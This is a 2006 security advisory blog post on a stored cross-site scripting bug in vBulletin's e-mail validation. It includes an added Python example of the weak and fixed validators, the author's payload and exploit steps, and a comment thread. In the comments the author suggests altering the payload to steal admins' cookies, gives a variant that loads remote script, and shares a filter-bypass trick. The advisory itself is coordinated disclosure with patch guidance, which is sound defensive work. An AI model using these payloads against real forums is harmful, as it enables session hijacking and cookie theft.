——–Summary——–
Software: vBulletin
Software's Web Site: http://www.vBulletin.com
Versions: 3.0.12-3.5.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: Medium
——-Description——-
There is a security bug in the powerful and widely used forum software vBulletin, versions 3.0.12 and 3.5.3, that allows an attacker to perform a cross-site scripting (XSS) attack. The bug results from quotation marks and the < and > characters not being sanitized in the "email" field of a user's profile information. Its source is a weak regular expression in the e-mail validation routine (is_valid_email()) that allows invalid characters in the domain-name part of the address; in addition, sendmessage.php forgets to pass the value through htmlspecialchars() on output, which makes the bug exploitable. A successful attack can result in cookie theft, hijacked pages, and so on.
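As an added example, not vBulletin's code, the following Python reproduces the two defects the description names side by side with their fixes: a validator with the described weakness (markup characters pass in the domain part), a hardened validator, and the output step with and without the missing escaping. The regular expressions are hypothetical reconstructions chosen to behave the way this page describes them (quotes and angle brackets are accepted, whitespace is not, and the field is capped at 50 characters as the comment thread below states); they are not vBulletin's actual PHP source.

```python
"""Added example (not vBulletin's code): a weak e-mail regex plus
unescaped output turns a profile field into stored XSS; a strict regex
or output escaping each closes it.  The patterns are hypothetical
reconstructions with the properties the advisory describes, not the
real is_valid_email() source."""
import html
import re

# Assumption taken from the comment thread: the e-mail field is capped
# at 50 characters, which bounds the size of any payload.
MAX_EMAIL_LEN = 50

# Weak pattern: the domain part accepts anything that is not whitespace
# or '@', so '"', '<' and '>' slip through as long as the string ends
# in a dot followed by letters (the ".nomatt" tail of the payload).
WEAK_EMAIL_RE = re.compile(r'^[a-z0-9._+-]+@[^\s@]+\.[a-z]+$', re.I)

# Hardened pattern: every domain label is limited to letters, digits
# and hyphens, so no markup character can appear anywhere in the value.
STRICT_EMAIL_RE = re.compile(
    r'^[a-z0-9._+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}$', re.I)


def is_valid_email_weak(email: str) -> bool:
    """Validator with the flaw the advisory describes."""
    return (len(email) <= MAX_EMAIL_LEN
            and WEAK_EMAIL_RE.match(email) is not None)


def is_valid_email_strict(email: str) -> bool:
    """Validator that rejects markup characters in the domain part."""
    return (len(email) <= MAX_EMAIL_LEN
            and STRICT_EMAIL_RE.match(email) is not None)


def render_mail_link_unsafe(email: str) -> str:
    """Output as the advisory describes it: the stored value echoed
    verbatim into the member-mail page."""
    return '<a href="mailto:%s">%s</a>' % (email, email)


def render_mail_link_safe(email: str) -> str:
    """Output with the missing step added: htmlspecialchars() with
    ENT_QUOTES in PHP, html.escape(..., quote=True) here."""
    safe = html.escape(email, quote=True)
    return '<a href="mailto:%s">%s</a>' % (safe, safe)


def contains_live_script(rendered: str) -> bool:
    """Crude check: does the rendered HTML still hold an unescaped
    <script tag?"""
    return '<script' in rendered.lower()


# The payload from the advisory (49 characters, so it fits the limit).
PAYLOAD = 'imei@myimei.com"><script>alert(1)</script>.nomatt'
# A variant containing a space; the comment thread notes that spaces
# are rejected by validation, and the weak regex reproduces that.
PAYLOAD_WITH_SPACE = 'i@ii.ii"><script src="aaa.aa/a.js"></script>.no'
# Constructed legitimate address for comparison.
LEGIT = 'user.name+tag@example.co.uk'

if __name__ == '__main__':
    for addr in (LEGIT, PAYLOAD, PAYLOAD_WITH_SPACE):
        print('%-50s weak=%-5s strict=%s' % (
            addr, is_valid_email_weak(addr), is_valid_email_strict(addr)))
    print(render_mail_link_unsafe(PAYLOAD))
    print(render_mail_link_safe(PAYLOAD))
```

Either fix alone stops this particular payload, but they guard different things: the strict pattern keeps markup out of the stored value, while escaping on output protects every page that prints the field, including ones that skip validation. A patched forum should do both.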
——-Conditions——-
The admin settings must be as follows:
Enable Email features=Yes
Allow Users to Email Other Members=Yes
Use Secure Email Sending=No
forum/admins/options.php?do=options&dogroup=email
These appear to be the default values.
——-Exploit——-
Scenario:
/forum/profile.php?do=editpassword
pass: your current password
email: imei@myimei.com"><script>alert(1)</script>.nomatt
Note the length limitation on the e-mail field.
****
forum/profile.php?do=editoptions
Receive Email from Other Members=Yes
****
forum/sendmessage.php?do=mailmember&u={your id}
——-Solution——-
Upgrade to the vendor-provided patch.
——-Credit——-
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
www.myimei.com
myimei.com/security
19 Responses to “vBulletin3.0.12&3.5.3~is_valid_email()~XSS Attack”
http://www.vbulletin.com/forum/showthread.php?t=176170
http://www.vbulletin.com/forum/showthread.php?t=176176
Left by imei on February 24th, 2006
Man, this is the real deal!!!!!
Left by Folaani on March 8th, 2006
How can we do it? How can we hack a site using this method?
Left by OpTiMuS on March 12th, 2006
Does your target forum have the above-mentioned conditions?
If so, enter the exploit text as your e-mail and send a link to sendmsg.php to the admins. You should alter that text to send their cookies to your script.
I am sorry about the lack of more details; we don't want to TEACH hacking.
However, there are many documents about XSS hacking.
Regards,
imei
Left by imei on March 12th, 2006
How can I close that bug??
Regards,
jeme
Left by jeme on March 12th, 2006
Please upgrade. vB provides a patch for this bug. (I coordinated with them and didn't publish this before informing the vendor.) 3.0.13 is the patched version for 3.0.12, and 3.5.4 is the safe version for those who have 3.5.3.
Be beautiful.
imei
Left by imei on March 13th, 2006
If you really can hack vBulletin version 3.5.3 then I'll give you money.
Just contact me and we will have a deal.
Left by Emad on April 27th, 2006
Dear Emad,
This is a website for going into a secure world, not a "how to hack" one. I don't need to show whether or not I can hack a vBulletin system. What I needed is what I got: security sites, and vbulletin.com itself, verified this bug and everything is OK!
BTW, if you'd like to learn XSS I can help you ;)
Left by imei on April 27th, 2006
http://www.securityfocus.com/bid/16919
Left by imei on April 28th, 2006
More serious code than alert(1) cannot be typed due to the length limitation (50). I cannot even call this bug a "vulnerability".
Left by Trasser on May 3rd, 2006
Exploiting a bug is a different science from finding a bug. Security bugs do not need a clear exploit to be called a "vulnerability".
BTW, I didn't want to spend more time on a patched and accepted bug, but you, as an interested person, may like to work on this one!
i{at}ii.ii"><script src="aaa.aa/a.js"></script>.no
Left by imei on May 4th, 2006
“
Left by Trasser on May 17th, 2006
2IMEI: spaces are not allowed, so this e-mail will be erroneous.
Left by Trasser on May 17th, 2006
i{at}ii.ii"><script""src="aaa.aa/a.js"></script>.no
What about this, dear?
Left by imei on May 17th, 2006
Nothing. %20 is not allowed, %a0 is allowed but doesn't work, "" is also allowed but doesn't work.
Left by Trasser on May 18th, 2006
Work on it, Trasser. There are some tricks for XSS; I'll show you one of them. As an ultimate solution I offer you this: don't close the <a tag that shows the mail link. After that you can inject events without a space separator ;))
Regards
Left by imei on May 20th, 2006
Man, thanks for this one. Can I know where you are from?
Left by JustMe on May 25th, 2006
Yes, sir. It is on my About Me page:
http://myimei.com/security/about-me/
Left by imei on May 26th, 2006
Can I have the best exploit, please??
Left by SjK on May 27th, 2006